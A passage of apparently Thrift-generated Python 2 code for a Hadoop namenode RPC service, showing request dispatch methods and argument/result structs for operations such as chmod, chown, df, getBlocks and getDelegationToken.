args = getBlocks_args()
args.read(iprot)
iprot.readMessageEnd()
result = getBlocks_result()
try:
result.success = self._handler.getBlocks(args.ctx, args.path, args.offset, args.length)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getBlocks", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getPreferredBlockSize(self, seqid, iprot, oprot):
args = getPreferredBlockSize_args()
args.read(iprot)
iprot.readMessageEnd()
result = getPreferredBlockSize_result()
try:
result.success = self._handler.getPreferredBlockSize(args.ctx, args.path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getPreferredBlockSize", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_isInSafeMode(self, seqid, iprot, oprot):
args = isInSafeMode_args()
args.read(iprot)
iprot.readMessageEnd()
result = isInSafeMode_result()
try:
result.success = self._handler.isInSafeMode(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("isInSafeMode", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_leaveSafeMode(self, seqid, iprot, oprot):
args = leaveSafeMode_args()
args.read(iprot)
iprot.readMessageEnd()
result = leaveSafeMode_result()
try:
self._handler.leaveSafeMode(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("leaveSafeMode", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_ls(self, seqid, iprot, oprot):
args = ls_args()
args.read(iprot)
iprot.readMessageEnd()
result = ls_result()
try:
result.success = self._handler.ls(args.ctx, args.path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("ls", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_mkdirhier(self, seqid, iprot, oprot):
args = mkdirhier_args()
args.read(iprot)
iprot.readMessageEnd()
result = mkdirhier_result()
try:
result.success = self._handler.mkdirhier(args.ctx, args.path, args.perms)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("mkdirhier", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_refreshNodes(self, seqid, iprot, oprot):
args = refreshNodes_args()
args.read(iprot)
iprot.readMessageEnd()
result = refreshNodes_result()
try:
self._handler.refreshNodes(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("refreshNodes", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_rename(self, seqid, iprot, oprot):
args = rename_args()
args.read(iprot)
iprot.readMessageEnd()
result = rename_result()
try:
result.success = self._handler.rename(args.ctx, args.path, args.newPath)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("rename", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_reportBadBlocks(self, seqid, iprot, oprot):
args = reportBadBlocks_args()
args.read(iprot)
iprot.readMessageEnd()
result = reportBadBlocks_result()
try:
self._handler.reportBadBlocks(args.ctx, args.blocks)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("reportBadBlocks", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_stat(self, seqid, iprot, oprot):
args = stat_args()
args.read(iprot)
iprot.readMessageEnd()
result = stat_result()
try:
result.success = self._handler.stat(args.ctx, args.path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("stat", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getContentSummary(self, seqid, iprot, oprot):
args = getContentSummary_args()
args.read(iprot)
iprot.readMessageEnd()
result = getContentSummary_result()
try:
result.success = self._handler.getContentSummary(args.ctx, args.Path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getContentSummary", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_multiGetContentSummary(self, seqid, iprot, oprot):
args = multiGetContentSummary_args()
args.read(iprot)
iprot.readMessageEnd()
result = multiGetContentSummary_result()
try:
result.success = self._handler.multiGetContentSummary(args.ctx, args.paths)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("multiGetContentSummary", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_setQuota(self, seqid, iprot, oprot):
args = setQuota_args()
args.read(iprot)
iprot.readMessageEnd()
result = setQuota_result()
try:
self._handler.setQuota(args.ctx, args.path, args.namespaceQuota, args.diskspaceQuota)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("setQuota", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_setReplication(self, seqid, iprot, oprot):
args = setReplication_args()
args.read(iprot)
iprot.readMessageEnd()
result = setReplication_result()
try:
result.success = self._handler.setReplication(args.ctx, args.path, args.replication)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("setReplication", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_unlink(self, seqid, iprot, oprot):
args = unlink_args()
args.read(iprot)
iprot.readMessageEnd()
result = unlink_result()
try:
result.success = self._handler.unlink(args.ctx, args.path, args.recursive)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("unlink", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_utime(self, seqid, iprot, oprot):
args = utime_args()
args.read(iprot)
iprot.readMessageEnd()
result = utime_result()
try:
self._handler.utime(args.ctx, args.path, args.atime, args.mtime)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("utime", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_datanodeUp(self, seqid, iprot, oprot):
args = datanodeUp_args()
args.read(iprot)
iprot.readMessageEnd()
result = datanodeUp_result()
self._handler.datanodeUp(args.name, args.storage, args.thriftPort)
oprot.writeMessageBegin("datanodeUp", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_datanodeDown(self, seqid, iprot, oprot):
args = datanodeDown_args()
args.read(iprot)
iprot.readMessageEnd()
result = datanodeDown_result()
self._handler.datanodeDown(args.name, args.storage, args.thriftPort)
oprot.writeMessageBegin("datanodeDown", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
  def process_getDelegationToken(self, seqid, iprot, oprot):
    # Server-side dispatch for the getDelegationToken() RPC: decode the args,
    # invoke the handler, and send back a REPLY message with the same seqid.
    args = getDelegationToken_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = getDelegationToken_result()
    try:
      result.success = self._handler.getDelegationToken(args.ctx, args.renewer)
    except hadoop.api.common.ttypes.IOException, err:  # declared thrift exception: shipped back in result.err
      result.err = err
    oprot.writeMessageBegin("getDelegationToken", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class chmod_args(object):
  """
  Thrift argument struct for the chmod() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10).
   - path: Path of the file or directory.
   - perms: New permissions for the file or directory.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  # Do not edit by hand: the fastbinary codec relies on this exact layout.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.I16, 'perms', None, None, ), # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, perms=None,):
    self.ctx = ctx
    self.path = path
    self.perms = perms

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: generic field-by-field decode, dispatching on field id.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I16:
          self.perms = iprot.readI16();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('chmod_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.perms is not None:
      oprot.writeFieldBegin('perms', TType.I16, 2)
      oprot.writeI16(self.perms)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    # Structural equality: same class and identical attribute dicts.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class chmod_result(object):
  """
  Thrift result struct for the chmod() RPC (void return).

  Attributes:
   - err: IOException raised by the server, if any.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, err=None,):
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('chmod_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class chown_args(object):
  """
  Thrift argument struct for the chown() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10).
   - path: Path to the file or directory
   - owner: New owner.
   - group: New group.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.STRING, 'owner', None, None, ), # 2
    (3, TType.STRING, 'group', None, None, ), # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, owner=None, group=None,):
    self.ctx = ctx
    self.path = path
    self.owner = owner
    self.group = group

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: generic field-by-field decode, dispatching on field id.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.owner = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.group = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('chown_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.owner is not None:
      oprot.writeFieldBegin('owner', TType.STRING, 2)
      oprot.writeString(self.owner)
      oprot.writeFieldEnd()
    if self.group is not None:
      oprot.writeFieldBegin('group', TType.STRING, 3)
      oprot.writeString(self.group)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class chown_result(object):
  """
  Thrift result struct for the chown() RPC (void return).

  Attributes:
   - err: IOException raised by the server, if any.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, err=None,):
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('chown_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class df_args(object):
  """
  Thrift argument struct for the df() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10); the only field.
  """

  # Tuple index == thrift field id; None entries pad unused ids 0-9.
  thrift_spec = (
    None, # 0
    None, # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None,):
    self.ctx = ctx

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('df_args')
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class df_result(object):
  """
  Thrift result struct for the df() RPC.

  Attributes:
   - success: list of i64 values returned by the server (field id 0).
  """

  # Field id 0 is the conventional thrift slot for a return value.
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.I64,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Decode the i64 list element by element.
          self.success = []
          (_etype10, _size7) = iprot.readListBegin()
          for _i11 in xrange(_size7):
            _elem12 = iprot.readI64();
            self.success.append(_elem12)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('df_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.I64, len(self.success))
      for iter13 in self.success:
        oprot.writeI64(iter13)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class enterSafeMode_args(object):
  """
  Thrift argument struct for the enterSafeMode() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10); the only field.
  """

  # Tuple index == thrift field id; None entries pad unused ids 0-9.
  thrift_spec = (
    None, # 0
    None, # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None,):
    self.ctx = ctx

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('enterSafeMode_args')
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class enterSafeMode_result(object):
  """
  Thrift result struct for the enterSafeMode() RPC (void return).

  Attributes:
   - err: IOException raised by the server, if any.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, err=None,):
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('enterSafeMode_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class getBlocks_args(object):
  """
  Thrift argument struct for the getBlocks() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10).
   - path: Path to the file.
   - offset: Offset of the region.
   - length: Length of the region
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.I64, 'offset', None, None, ), # 2
    (3, TType.I64, 'length', None, None, ), # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, offset=None, length=None,):
    self.ctx = ctx
    self.path = path
    self.offset = offset
    self.length = length

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: generic field-by-field decode, dispatching on field id.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I64:
          self.offset = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I64:
          self.length = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getBlocks_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.offset is not None:
      oprot.writeFieldBegin('offset', TType.I64, 2)
      oprot.writeI64(self.offset)
      oprot.writeFieldEnd()
    if self.length is not None:
      oprot.writeFieldBegin('length', TType.I64, 3)
      oprot.writeI64(self.length)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class getBlocks_result(object):
  """
  Thrift result struct for the getBlocks() RPC.

  Attributes:
   - success: list of Block structs (field id 0).
